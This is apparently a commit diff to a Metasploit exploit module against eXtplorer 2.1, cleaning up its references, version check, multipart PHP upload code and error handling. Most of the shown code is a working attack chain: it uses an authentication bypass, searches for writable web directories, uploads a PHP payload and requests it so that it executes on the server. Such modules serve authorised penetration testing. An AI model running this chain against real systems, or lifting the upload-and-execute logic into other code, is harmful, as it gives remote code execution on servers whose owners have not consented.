extplorer_upload_exec cleanup

Author: jvazquez-r7

modules/exploits/multi/http/extplorer_upload_exec.rb

@@ -30,16 +30,13 @@ def initialize(info={})
 				],
 			'References'     =>
 				[
-					['URL', 'http://itsecuritysolutions.org/2012-12-31-eXtplorer-v2.1-authentication-bypass-vulnerability'],
-					['URL', 'http://extplorer.net/issues/105']
+					[ 'OSVDB', '88751' ],
+					[ 'BID', '57058' ],
+					[ 'URL', 'http://itsecuritysolutions.org/2012-12-31-eXtplorer-v2.1-authentication-bypass-vulnerability' ],
+					[ 'URL', 'http://extplorer.net/issues/105' ]
 				],
 			'Payload'        =>
 				{
-					'BadChars' => "\x00"
-				},
-			'DefaultOptions'  =>
-				{
-					'ExitFunction' => "none"
 				},
 			'Platform'       => 'php',
 			'Arch'           => ARCH_PHP,
@@ -71,9 +68,18 @@ def check
 				'uri'    => "#{base}extplorer.xml"
 			})
 
-			return Exploit::CheckCode::Vulnerable if res and res.code == 200 and res.body =~ /<version>2\.1\.(0RC5|0|1|2)<\/version>/
-			return Exploit::CheckCode::Detected   if res and res.code == 200 and res.body =~ /eXtplorer/
-			return Exploit::CheckCode::Safe
+			if !res or res.code != 200
+				return Exploit::CheckCode::Safe
+			end
+
+			if res.body =~ /<version>2\.1\.0RC[012]<\/version>/
+				return Exploit::CheckCode::Vulnerable
+			end
+
+			if res.body =~ /eXtplorer/
+				return Exploit::CheckCode::Safe
+			end
+
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
 			print_error("#{peer} - Connection failed")
 		end
@@ -92,29 +98,22 @@ def on_new_session(client)
 
 	def upload(base, dir, fname, file)
 
-		boundary   = "----WebKitFormBoundary#{rand_text_alphanumeric(10)}"
-		data_post  = "--#{boundary}\r\n"
-		data_post << "Content-Disposition: form-data; name=\"userfile[0]\"; filename=\"#{fname}\"\r\n"
-		data_post << "Content-Type: application/x-httpd-php\r\n"
-		data_post << "\r\n#{file}\r\n"
-		data_post << "--#{boundary}\r\n"
-		data_post << "Content-Disposition: form-data; name=\"overwrite_files\"\r\n\r\non\r\n"
-		data_post << "--#{boundary}\r\n"
-		data_post << "Content-Disposition: form-data; name=\"dir\"\r\n\r\n%2f#{dir}\r\n"
-		data_post << "--#{boundary}\r\n"
-		data_post << "Content-Disposition: form-data; name=\"option\"\r\n\r\ncom_extplorer\r\n"
-		data_post << "--#{boundary}\r\n"
-		data_post << "Content-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n"
-		data_post << "--#{boundary}\r\n"
-		data_post << "Content-Disposition: form-data; name=\"requestType\"\r\n\r\nxmlhttprequest\r\n"
-		data_post << "--#{boundary}\r\n"
-		data_post << "Content-Disposition: form-data; name=\"confirm\"\r\n\r\ntrue\r\n"
-		data_post << "--#{boundary}\r\n"
+		data = Rex::MIME::Message.new
+		data.add_part(file, 'application/x-httpd-php', nil, "form-data; name=\"userfile[0]\"; filename=\"#{fname}\"")
+		data.add_part("on", nil, nil, "form-data; name=\"overwrite_files\"")
+		data.add_part("%2f#{dir}", nil, nil, "form-data; name=\"dir\"")
+		data.add_part("com_extplorer", nil, nil, "form-data; name=\"option\"")
+		data.add_part("upload", nil, nil, "form-data; name=\"action\"")
+		data.add_part("xmlhttprequest", nil, nil, "form-data; name=\"requestType\"")
+		data.add_part("true", nil, nil, "form-data; name=\"confirm\"")
+
+		data_post = data.to_s
+		data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
 
 		res = send_request_cgi({
 			'method'  => 'POST',
 			'uri'     => "#{base}index.php",
-			'ctype'   => "multipart/form-data; boundary=#{boundary}",
+			'ctype'   => "multipart/form-data; boundary=#{data.bound}",
 			'data'    => data_post,
 			'cookie'  => datastore['COOKIE'],
 		})
@@ -149,8 +148,7 @@ def exploit
 		if res and res.code == 200 and res.body =~ /Are you sure you want to delete these/
 			print_status("#{@peer} - Authenticated successfully")
 		else
-			print_error("#{@peer} - Authentication failed")
-			return
+			fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed")
 		end
 
 		# search for writable directories
@@ -163,8 +161,7 @@ def exploit
 				'data'    => "option=com_extplorer&action=getdircontents&dir=#{base}&sendWhat=dirs&node=ext_root",
 			})
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-			print_error("#{@peer} - Connection failed")
-			return
+			fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
 		end
 		if res and res.code == 200 and res.body =~ /\{'text':'([^']+)'[^\}]+'is_writable':true/
 			dir = "#{base}#{$1}"
@@ -182,12 +179,10 @@ def exploit
 			if res and res.code == 200 and res.body =~ /'message':'Upload successful\!'/
 				print_good("#{@peer} - File uploaded successfully")
 			else
-				print_error("#{@peer} - Uploading PHP payload failed")
-				return
+				fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
 			end
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-			print_error("#{@peer} - Connection failed")
-			return
+			fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
 		end
 
 		# search directories in the web root for the file
@@ -200,8 +195,7 @@ def exploit
 				'cookie' => datastore['COOKIE'],
 			})
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-			print_error("#{@peer} - Connection failed")
-			return
+			fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
 		end
 		if res and res.code == 200 and res.body =~ /'dir':'\\\/([^']+)'/
 			dir = $1.gsub('\\','')
@@ -218,8 +212,7 @@ def exploit
 				'uri'    => "/#{dir}/#{@fname}"
 			})
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-			print_error("#{@peer} - Connection failed")
-			return
+			fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
 		end
 		if res and res.code != 200
 			print_error("#{@peer} - Executing payload failed")